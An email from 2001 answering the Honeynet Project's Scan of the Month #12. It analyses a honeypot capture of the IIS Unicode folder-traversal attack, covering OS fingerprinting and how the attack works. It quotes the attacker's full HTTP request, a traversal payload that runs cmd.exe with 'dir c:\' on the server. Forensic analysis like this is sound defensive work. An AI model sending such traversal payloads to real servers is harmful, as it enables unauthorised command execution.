From gfk@logidac.com Wed Feb 14 19:11:42 2001
Date: Mon, 29 Jan 2001 21:43:53 -0500
From: Guillaume Filion
To: project@honeynet.org
Subject: Scan of the month
[ The following text is in the "iso-8859-1" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]
Hi guys,
Here's my try at the forensic and analysis of the Scan of the month
#12. It's my first try at this kind of thing, so excuse my
mistakes... Usually, the scans of the month are way over my head, but
this one looked easier, so I gave it a try.
### QUESTION 1: What is the operating system of the honeypot, how do you know?
The attacker thinks that it's WinNT (it's a WinNT attack) running
IIS/ASP (the cookie name is ASPSessionID*).
Since the attack worked, I guess the attacker was right... 8)
The answer from the honeypot server says: Server: Microsoft-IIS/4.0
Passive TCP/IP Fingerprinting shows:
TTL: 128 DF is on. Win: 0x2238 -> 8760 TOS: 0x0
The DB (http://project.honeynet.org/papers/finger/traces.txt) shows:
Windows 9x/NT Intel 32 5000-9000 y 0
Windows 9x/NT Intel 128 5000-9000 y 0
Windows 2000 Intel 128 17000-18000 y 0
Every infos except DF looks like it's WinNT 4.0.
### QUESTION 2: What is the name of this attack?
I think that M$ calls it "Web Server Folder Traversal" or "File
permission canonicalization".
### QUESTION 3: What is the attack attempting to accomplish?
It tries to execute the command "dir c:\"
That is having the server send the attacker the content of the c
drive's \ directory.
### QUESTION 4: How does the attack work?
Here's a post from "rain forest puppy" relating to the vulnerability:
http://packetstorm.securify.com/0010-exploits/iis-unicode.txt
I found a nice summary at a Vuln-Dev archive, strangely, it's not
available anymore at securityfocus' archive.
http://archives.neohapsis.com/archives/vuln-dev/2000-q4/0255.html
To summarise the summary, it tries to make the server execute the
command "dir c:"
However, just sending
GET /../../winnt/system32/cmd.exe?c+dir+c:\
would not work because IIS blocks "../" if this is directed outside
of the server scope. Someone clever found out that sending the
Unicode for slash / (0xC0 0xAF) does not get catched by IIS. That
way, the attacker is able to go snoop around about everywhere on the
server.
BTW, here is the request sent by the attacker:
GET /msadc/....../....../....../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-excel, application/msword,
application/vnd.ms-powerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQQQQZU=KNOHMOJAKPFOPHMLAPNIFIFB....APNIFIFB....
What is funny is that if you go to lab.wiretrip.net, you see that the
site is called "rain forest puppy", which is the name of the guy who
signed one of the posts I was talking about and also reported the
vulnerability to Microsoft. You guys are funny!
### Bonus Question: Is it possible to gain remote control of the
system using this technqiue? If so, how?
As Bill Clinton's Attorneys would say, "This depends on your
definition of 'remote control of the system'." ;-)
However, as stated in Microsoft's advisory
(http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp),
"The vulnerability could potentially allow a visitor to a web site to
take a wide range of destructive actions against it, including
running programs on it." So I guess this fits in the definition fo
"remote control of the system."
Best,
GFK's
--
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
[ Part 2, Application/PGP-SIGNATURE 229bytes. ]
[ Unable to print this part. ]